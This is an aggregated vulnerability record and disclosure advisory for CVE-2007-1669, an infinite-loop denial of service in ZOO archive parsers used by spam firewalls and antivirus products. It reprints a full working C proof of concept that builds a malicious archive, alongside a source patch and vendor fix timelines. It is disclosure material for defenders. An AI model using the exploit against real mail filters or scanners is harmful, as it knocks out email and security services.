ID

VAR-200705-0183


CVE

CVE-2007-1669


TITLE

Barracuda Spam Firewall Used in etc. zoo decoder Service disruption in (DoS) Vulnerabilities

Trust: 0.8

sources: JVNDB: JVNDB-2007-001742

DESCRIPTION

zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. (1) Barracuda Spam Firewall Or (2) Spam Firewall ,and (3) AMaViS Used in etc. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. A successful attack can exhaust system resources and trigger a denial-of-service condition. This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. The vulnerability is caused due to an error in the handling of Zoo archives. This can be exploited to cause an infinite loop resulting in high CPU utilisation. SOLUTION: Update to firmware version 3.4 and virus definition 2.0.6399 or later. PROVIDED AND/OR DISCOVERED BY: Jean-Sebastien Guay-Leroux ORIGINAL ADVISORY: Barracuda Networks: http://www.barracudanetworks.com/ns/resources/tech_alert.php Jean-Sebastien Guay-Leroux: http://www.guay-leroux.com/projects/zoo-infinite-advisory.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Topic: Multiple vendors ZOO file decompression infinite loop DoS Announced: 2007-05-04 Credits: Jean-Sebastien Guay-Leroux Products: Multiple (see section III) Impact: DoS (99% CPU utilisation) CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671, CVE-2007-1672, CVE-2007-1673 I. BACKGROUND Zoo is a compression program and format developed by Rahul Dhesi in the mid 1980s. The format is based on the LZW compression algorithm and compressed files are identified by the .zoo file extension. II. The vulnerability lies in the algorithm used to locate the files inside the archive. Each file in a ZOO archive is identified by a direntry structure. Those structures are linked between themselves with a 'next' pointer. This pointer is in fact an offset from the beginning of the file, representing the next direntry structure. By specifying an already processed file, it's possible to process more than one time this same file. The ZOO parser will then enter an infinite loop condition. III. AFFECTED SOFTWARES o Barracuda Spam Firewall o Panda Software Antivirus o avast! antivirus o Avira AntiVir o zoo-2.10 o unzoo.c o WinAce o PicoZip IV. IMPACT If this attack is conducted against a vulnerable antivirus, the host system will have its CPU at 100% utilization and may have problems answering other requests. If this attack is conducted against an SMTP content filter running a vulnerable ZOO implementation, legitimate clients may be unable to send and receive email through this server. V. SOLUTION o Barracuda Spam Firewall - CVE-2007-1669: They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and 2.0.6399o for firmware < 3.4 March 19th 2007. o Panda Software Antivirus - CVE-2007-1670: They fixed this problem April 2nd 2007. o avast! antivirus - CVE-2007-1672: They fixed this problem in version 4.7.981, April 14th 2007. o Avira AntiVir - CVE-2007-1671: They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007. o zoo-2.10 - CVE-2007-1669: This software is not maintained anymore. A patch for version 2.10 is provided in section VII of this advisory because some SMTP content filters may still use this software. o unzoo.c - CVE-2007-1673: This software is not maintained anymore. No patch is provided for this software. o WinAce was contacted but no response was received from them. o PicoZip was contacted but no response was received from them. VI. PROOF OF CONCEPT Using the PIRANA framework version 0.3.3, available at http://www.guay-leroux.com , it is possible to test your SMTP server against this vulnerability. Alternatively, here is an exploit that will create a file that will trigger the infinite loop condition when it is processed. /* Exploit for the vulnerability: Multiple vendors ZOO file decompression infinite loop DoS coded by Jean-S\xe9bastien Guay-Leroux September 2006 */ #include <stdio.h> #include <stdlib.h> #include <string.h> // Structure of a ZOO header #define ZOO_HEADER_SIZE 0x0000002a #define ZH_TEXT 0 #define ZH_TAG 20 #define ZH_START_OFFSET 24 #define ZH_NEG_START_OFFSET 28 #define ZH_MAJ_VER 32 #define ZH_MIN_VER 33 #define ZH_ARC_HTYPE 34 #define ZH_ARC_COMMENT 35 #define ZH_ARC_COMMENT_LENGTH 39 #define ZH_VERSION_DATA 41 #define D_DIRENTRY_LENGTH 56 #define D_TAG 0 #define D_TYPE 4 #define D_PACKING_METHOD 5 #define D_NEXT_ENTRY 6 #define D_OFFSET 10 #define D_DATE 14 #define D_TIME 16 #define D_FILE_CRC 18 #define D_ORIGINAL_SIZE 20 #define D_SIZE_NOW 24 #define D_MAJ_VER 28 #define D_MIN_VER 29 #define D_DELETED 30 #define D_FILE_STRUCT 31 #define D_COMMENT_OFFSET 32 #define D_COMMENT_SIZE 36 #define D_FILENAME 38 #define D_VAR_DIR_LEN 51 #define D_TIMEZONE 53 #define D_DIR_CRC 54 #define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 ) #define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 ) #define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 ) void put_byte (char *ptr, unsigned char data) { *ptr = data; } void put_word (char *ptr, unsigned short data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); } void put_longword (char *ptr, unsigned long data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); put_byte (ptr + 2, data >> 16); put_byte (ptr + 3, data >> 24); } FILE * open_file (char *filename) { FILE *fp; fp = fopen ( filename , "w" ); if (!fp) { perror ("Cant open file"); exit (1); } return fp; } void usage (char *progname) { printf ("\nTo use:\n"); printf ("%s <archive name>\n\n", progname); exit (1); } int main (int argc, char *argv[]) { FILE *fp; char *hdr = (char *) malloc (4096); char *filename = (char *) malloc (256); int written_bytes; int total_size; if ( argc != 2) { usage ( argv[0] ); } strncpy (filename, argv[1], 255); if (!hdr || !filename) { perror ("Error allocating memory"); exit (1); } memset (hdr, 0x00, 4096); // Build a ZOO header memcpy (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18); put_longword (hdr + ZH_TAG, 0xfdc4a7dc); put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE); put_longword (hdr + ZH_NEG_START_OFFSET, (ZOO_HEADER_SIZE) * -1); put_byte (hdr + ZH_MAJ_VER, 2); put_byte (hdr + ZH_MIN_VER, 0); put_byte (hdr + ZH_ARC_HTYPE, 1); put_longword (hdr + ZH_ARC_COMMENT, 0); put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0); put_byte (hdr + ZH_VERSION_DATA, 3); // Build vulnerable direntry struct put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc); put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1); put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a); put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71); put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394); put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650); put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0); put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1); put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0); put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0); put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0); put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0); memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME, "AAAAAAAA.AAA", 13); total_size = ZOO_HEADER_SIZE + 51; fp = open_file (filename); if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) { printf ("The file has been written\n"); } else { printf ("Cant write to the file\n"); exit (1); } fclose (fp); return 0; } VII. PATCH To fix this issue, ensure that the offset of the next file to process is always greater than the one you are currently processing. This will guarantee the fact that it's not possible to process the same files over and over again. Here is a patch for the software zoo version 2.10 distributed with many UNIX systems: diff -u zoo/zooext.c zoo-patched/zooext.c --- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400 +++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500 @@ -89,6 +89,7 @@ #endif struct direntry direntry; /* directory entry */ int first_dir = 1; /* first dir entry seen? */ +unsigned long zoo_pointer = 0; /* Track our position in the file */ static char extract_ver[] = "Zoo %d.%d is needed to extract %s.\n"; static char no_space[] = "Insufficient disk space to extract %s.\n"; @@ -169,6 +170,9 @@ exit_status = 1; } zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data begins */ + + /* Begin tracking our position in the file */ + zoo_pointer = zoo_header.zoo_start; } #ifndef PORTABLE @@ -597,6 +601,12 @@ } /* end if */ loop_again: + + /* Make sure we are not seeking to already processed data */ + if (next_ptr <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = next_ptr; + zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */ } /* end while */ diff -u zoo/zoolist.c zoo-patched/zoolist.c --- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400 +++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500 @@ -92,6 +92,7 @@ int show_mode = 0; /* show file protection */ #endif int first_dir = 1; /* if first direntry -- to adjust dat_ofs */ +unsigned long zoo_pointer = 0; /* Track our position in the file */ while (*option) { switch (*option) { @@ -211,6 +212,9 @@ show_acmt (&zoo_header, zoo_file, 0); /* show archive comment */ } + /* Begin tracking our position in the file */ + zoo_pointer = zoo_header.zoo_start; + /* Seek to the beginning of the first directory entry */ if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) { ercount++; @@ -437,6 +441,11 @@ if (verb_list && !fast) show_comment (&direntry, zoo_file, 0, (char *) NULL); } /* end if (lots of conditions) */ + + /* Make sure we are not seeking to already processed data */ + if (direntry.next <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = direntry.next; /* ..seek to next dir entry */ zooseek (zoo_file, direntry.next, 0); VIII. CREDITS Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it. IX. REFERENCES 1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669 2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670 3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671 4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672 5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673 X. HISTORY 2006-09-?? : Vulnerability is found 2007-03-19 : All vendors notified 2007-03-19 : Barracuda Networks provided a fix 2007-03-22 : Avira provided a fix 2007-04-02 : Panda Antivirus provided a fix 2007-04-14 : avast! antivirus provided a fix 2007-05-04 : Public disclosure

Trust: 2.16

sources: NVD: CVE-2007-1669 // JVNDB: JVNDB-2007-001742 // BID: 23823 // VULHUB: VHN-25031 // PACKETSTORM: 56548 // PACKETSTORM: 56479

AFFECTED PRODUCTS

vendor:amavismodel:amavisscope:lteversion:2.4.1

Trust: 1.8

vendor:barracudamodel:spam firewallscope:eqversion:3.4 and later

Trust: 0.8

vendor:pandamodel:activescanscope:eqversion:5.53

Trust: 0.6

vendor:barracudamodel:spam firewallscope:eqversion:3.3.3

Trust: 0.6

vendor:barracudamodel:spam firewallscope:eqversion:3.3.0.54

Trust: 0.6

vendor:barracudamodel:spam firewallscope:eqversion:3.3.03.055

Trust: 0.6

vendor:barracudamodel:spam firewallscope:eqversion:3.3.15.026

Trust: 0.6

vendor:barracudamodel:spam firewallscope:eqversion:3.1.18

Trust: 0.6

vendor:barracudamodel:spam firewallscope:eqversion:3.1.17

Trust: 0.6

vendor:barracudamodel:spam firewallscope:eqversion:3.4

Trust: 0.6

vendor:barracudamodel:spam firewallscope:eqversion:3.3.01.001

Trust: 0.6

vendor:barracudamodel:spam firewallscope:eqversion:3.3.03.053

Trust: 0.6

vendor:zoomodel:zooscope:eqversion:2.10

Trust: 0.3

vendor:winacemodel:winacescope:eqversion:2.605

Trust: 0.3

vendor:winacemodel:winacescope:eqversion:2.5

Trust: 0.3

vendor:winacemodel:winacescope:eqversion:2.60

Trust: 0.3

vendor:unzoomodel:unzooscope:eqversion:4.4-2

Trust: 0.3

vendor:picozipmodel:picozipscope:eqversion:4.0.2

Trust: 0.3

vendor:picozipmodel:picozipscope:eqversion:4.0.1

Trust: 0.3

vendor:pandamodel:titanium antivirus antispywarescope:eqversion:2006+

Trust: 0.3

vendor:pandamodel:titanium antivirusscope:eqversion:2005

Trust: 0.3

vendor:pandamodel:platinum internet securityscope:eqversion:20070

Trust: 0.3

vendor:pandamodel:platinum internet securityscope:eqversion:2006

Trust: 0.3

vendor:pandamodel:antivirus platinumscope:eqversion:2.0

Trust: 0.3

vendor:pandamodel:antivirus for netwarescope:eqversion:2.0

Trust: 0.3

vendor:pandamodel:activescanscope:eqversion:5.54.1

Trust: 0.3

vendor:pandamodel:activescanscope:eqversion:5.0

Trust: 0.3

vendor:barracudamodel:networks barracuda spam firewallscope:eqversion:3.3.15026

Trust: 0.3

vendor:barracudamodel:networks barracuda spam firewallscope:eqversion:3.1.18

Trust: 0.3

vendor:barracudamodel:networks barracuda spam firewallscope:eqversion:3.1.17

Trust: 0.3

vendor:barracudamodel:networks barracuda spam firewallscope:eqversion:3.3.03.055

Trust: 0.3

vendor:barracudamodel:networks barracuda spam firewallscope:eqversion:3.3.03.053

Trust: 0.3

vendor:barracudamodel:networks barracuda spam firewallscope:eqversion:3.3.03.022

Trust: 0.3

vendor:barracudamodel:networks barracuda spam firewallscope:eqversion:3.3.01.001

Trust: 0.3

vendor:barracudamodel:networks barracuda spam firewallscope:eqversion:3.3.0.54

Trust: 0.3

vendor:aviramodel:desktop for windowsscope:eqversion:1.00.00.68

Trust: 0.3

vendor:aviramodel:antivir workstation professional buildscope:eqversion:367

Trust: 0.3

vendor:aviramodel:antivir personaledition premium buildscope:eqversion:228

Trust: 0.3

vendor:aviramodel:antivir personaledition classic buildscope:eqversion:180

Trust: 0.3

vendor:aviramodel:antivirscope:eqversion:6.35.00.00

Trust: 0.3

vendor:avastmodel:avast! linux home editionscope:eqversion:1.0.5

Trust: 0.3

vendor:avastmodel:avast! linux home editionscope:eqversion:1.0.5-1

Trust: 0.3

vendor:avastmodel:antivirus server editionscope:eqversion:4.7.726

Trust: 0.3

vendor:avastmodel:antivirus server editionscope:eqversion:4.7.676

Trust: 0.3

vendor:avastmodel:antivirus server editionscope:eqversion:4.7.660

Trust: 0.3

vendor:avastmodel:antivirus server editionscope:eqversion:4.6.566

Trust: 0.3

vendor:avastmodel:antivirus server editionscope:eqversion:4.6.489

Trust: 0.3

vendor:avastmodel:antivirus server editionscope:eqversion:4.6.460

Trust: 0.3

vendor:avastmodel:antivirus professional editionscope:eqversion:4.7.844

Trust: 0.3

vendor:avastmodel:antivirus professional editionscope:eqversion:4.7.827

Trust: 0.3

vendor:avastmodel:antivirus professional editionscope:eqversion:4.6.691

Trust: 0.3

vendor:avastmodel:antivirus professional editionscope:eqversion:4.6.665

Trust: 0.3

vendor:avastmodel:antivirus professional editionscope:eqversion:4.6.652

Trust: 0.3

vendor:avastmodel:antivirus professional editionscope:eqversion:4.6.603

Trust: 0.3

vendor:avastmodel:antivirus professional editionscope:eqversion:4.6

Trust: 0.3

vendor:avastmodel:antivirus professional editionscope:eqversion:4.0

Trust: 0.3

vendor:avastmodel:antivirus managed clientscope:eqversion:4.6.394

Trust: 0.3

vendor:avastmodel:antivirus managed clientscope: - version: -

Trust: 0.3

vendor:avastmodel:antivirus home editionscope:eqversion:4.7.869

Trust: 0.3

vendor:avastmodel:antivirus home editionscope:eqversion:4.7.844

Trust: 0.3

vendor:avastmodel:antivirus home editionscope:eqversion:4.7.827

Trust: 0.3

vendor:avastmodel:antivirus home editionscope:eqversion:4.6.691

Trust: 0.3

vendor:avastmodel:antivirus home editionscope:eqversion:4.6.665

Trust: 0.3

vendor:avastmodel:antivirus home editionscope:eqversion:4.6.655

Trust: 0.3

vendor:avastmodel:antivirus home editionscope:eqversion:4.6.652

Trust: 0.3

vendor:avastmodel:antivirus home editionscope:eqversion:4.6

Trust: 0.3

vendor:avastmodel:antivirus home editionscope:eqversion:4.0

Trust: 0.3

sources: BID: 23823 // JVNDB: JVNDB-2007-001742 // CNNVD: CNNVD-200705-120 // NVD: CVE-2007-1669

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2007-1669
value: HIGH

Trust: 1.0

NVD: CVE-2007-1669
value: HIGH

Trust: 0.8

CNNVD: CNNVD-200705-120
value: HIGH

Trust: 0.6

VULHUB: VHN-25031
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2007-1669
severity: HIGH
baseScore: 7.8
vectorString: AV:N/AC:L/AU:N/C:N/I:N/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-25031
severity: HIGH
baseScore: 7.8
vectorString: AV:N/AC:L/AU:N/C:N/I:N/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-25031 // JVNDB: JVNDB-2007-001742 // CNNVD: CNNVD-200705-120 // NVD: CVE-2007-1669

PROBLEMTYPE DATA

problemtype:NVD-CWE-Other

Trust: 1.0

problemtype:CWE-DesignError

Trust: 0.8

sources: JVNDB: JVNDB-2007-001742 // NVD: CVE-2007-1669

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-200705-120

TYPE

Design Error

Trust: 0.9

sources: BID: 23823 // CNNVD: CNNVD-200705-120

CONFIGURATIONS

sources: JVNDB: JVNDB-2007-001742

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-25031

PATCH

title:Top Pageurl:http://amavis.org/

Trust: 0.8

title:Barracuda Spam & Virus Firewallurl:http://www.barracudanetworks.com/ns/products/spam_overview.php

Trust: 0.8

sources: JVNDB: JVNDB-2007-001742

EXTERNAL IDS

db:NVDid:CVE-2007-1669

Trust: 2.9

db:BIDid:23823

Trust: 2.0

db:SECUNIAid:25122

Trust: 1.8

db:SECUNIAid:25315

Trust: 1.7

db:VUPENid:ADV-2007-1699

Trust: 1.7

db:SREASONid:2680

Trust: 1.7

db:OSVDBid:35795

Trust: 1.7

db:JVNDBid:JVNDB-2007-001742

Trust: 0.8

db:XFid:34080

Trust: 0.6

db:BUGTRAQid:20070504 MULTIPLE VENDORS ZOO FILE DECOMPRESSION INFINITE LOOP DOS

Trust: 0.6

db:VIMid:20070724 ZOO - AMAVIS - BARRACUDA CROSS-REF PROBLEMS

Trust: 0.6

db:CNNVDid:CNNVD-200705-120

Trust: 0.6

db:EXPLOIT-DBid:3851

Trust: 0.1

db:VULHUBid:VHN-25031

Trust: 0.1

db:PACKETSTORMid:56548

Trust: 0.1

db:PACKETSTORMid:56479

Trust: 0.1

sources: VULHUB: VHN-25031 // BID: 23823 // JVNDB: JVNDB-2007-001742 // PACKETSTORM: 56548 // PACKETSTORM: 56479 // CNNVD: CNNVD-200705-120 // NVD: CVE-2007-1669

REFERENCES

url:http://www.securityfocus.com/bid/23823

Trust: 1.7

url:http://www.amavis.org/security/asa-2007-2.txt

Trust: 1.7

url:http://www.osvdb.org/35795

Trust: 1.7

url:http://secunia.com/advisories/25122

Trust: 1.7

url:http://secunia.com/advisories/25315

Trust: 1.7

url:http://securityreason.com/securityalert/2680

Trust: 1.7

url:http://www.attrition.org/pipermail/vim/2007-july/001725.html

Trust: 1.7

url:http://www.securityfocus.com/archive/1/467646/100/0/threaded

Trust: 1.1

url:http://www.vupen.com/english/advisories/2007/1699

Trust: 1.1

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/34080

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1669

Trust: 0.9

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-1669

Trust: 0.8

url:http://www.barracudanetworks.com/ns/products/spam_overview.php

Trust: 0.6

url:http://xforce.iss.net/xforce/xfdb/34080

Trust: 0.6

url:http://www.securityfocus.com/archive/1/archive/1/467646/100/0/threaded

Trust: 0.6

url:http://www.frsirt.com/english/advisories/2007/1699

Trust: 0.6

url:http://www.avast.com

Trust: 0.3

url:http://www.avira.com/

Trust: 0.3

url:http://www.pandasoftware.com/

Trust: 0.3

url:http://www.picozip.com/

Trust: 0.3

url:http://www.winace.com/

Trust: 0.3

url:/archive/1/467646

Trust: 0.3

url:http://archives.math.utk.edu/software/multi-platform/gap/util/unzoo.c

Trust: 0.3

url:http://www.barracudanetworks.com/ns/resources/tech_alert.php

Trust: 0.1

url:http://secunia.com/secunia_security_advisories/

Trust: 0.1

url:http://secunia.com/network_software_inspector/

Trust: 0.1

url:http://www.guay-leroux.com/projects/zoo-infinite-advisory.txt

Trust: 0.1

url:http://secunia.com/product/4639/

Trust: 0.1

url:http://secunia.com/advisories/25122/

Trust: 0.1

url:http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

Trust: 0.1

url:http://secunia.com/about_secunia_advisories/

Trust: 0.1

url:http://www.guay-leroux.com

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1673

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1671

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1672

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1670

Trust: 0.1

sources: VULHUB: VHN-25031 // BID: 23823 // JVNDB: JVNDB-2007-001742 // PACKETSTORM: 56548 // PACKETSTORM: 56479 // CNNVD: CNNVD-200705-120 // NVD: CVE-2007-1669

CREDITS

Jean-Sebastien Guay-Leroux is credited with discovering this issue.

Trust: 0.9

sources: BID: 23823 // CNNVD: CNNVD-200705-120

SOURCES

db:VULHUBid:VHN-25031
db:BIDid:23823
db:JVNDBid:JVNDB-2007-001742
db:PACKETSTORMid:56548
db:PACKETSTORMid:56479
db:CNNVDid:CNNVD-200705-120
db:NVDid:CVE-2007-1669

LAST UPDATE DATE

2024-11-23T22:36:14.092000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-25031date:2018-10-16T00:00:00
db:BIDid:23823date:2016-07-06T14:39:00
db:JVNDBid:JVNDB-2007-001742date:2012-06-26T00:00:00
db:CNNVDid:CNNVD-200705-120date:2007-05-10T00:00:00
db:NVDid:CVE-2007-1669date:2024-11-21T00:28:53.433

SOURCES RELEASE DATE

db:VULHUBid:VHN-25031date:2007-05-09T00:00:00
db:BIDid:23823date:2007-05-04T00:00:00
db:JVNDBid:JVNDB-2007-001742date:2012-06-26T00:00:00
db:PACKETSTORMid:56548date:2007-05-10T00:32:46
db:PACKETSTORMid:56479date:2007-05-04T16:51:04
db:CNNVDid:CNNVD-200705-120date:2007-05-08T00:00:00
db:NVDid:CVE-2007-1669date:2007-05-09T00:19:00